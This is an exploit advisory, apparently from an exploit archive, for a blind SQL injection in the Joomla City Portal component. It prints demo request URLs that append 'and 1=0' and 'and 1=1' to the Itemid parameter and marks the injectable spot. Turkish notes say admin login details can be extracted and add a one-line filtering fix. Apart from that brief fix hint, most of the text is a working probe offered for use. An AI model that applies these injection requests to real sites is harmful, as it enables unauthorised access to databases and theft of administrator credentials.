29 lines
No EOL
970 B
Text
29 lines
No EOL
970 B
Text
<------------------- header data start ------------------- >
|
|
#########################################################################
|
|
# Joomla Component City Portal Blind SQL Injection Vulnerability #
|
|
#########################################################################
|
|
# author : Fl0riX
|
|
|
|
# Script Name : Joomla Component City Portal
|
|
|
|
# Bug Type : Blind SQL Injection
|
|
|
|
# Infection : Admin login bilgileri al�nabilir.
|
|
|
|
# Demo Vuln. :
|
|
(-)
|
|
� http://server/index.php?option=com_content&task=view&id=36&Itemid=1 and 1=0
|
|
(+)
|
|
� http://server/index.php?option=com_content&task=view&id=36&Itemid=1 and 1=1
|
|
|
|
# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.
|
|
|
|
#############################################################
|
|
|
|
< ------------------- header data end of ------------------- >
|
|
|
|
< -- bug code start -- >
|
|
|
|
path/index.php?option=com_content&task=view&id=36&Itemid=[Blind SQL]
|
|
|
|
< -- bug code end of -- > |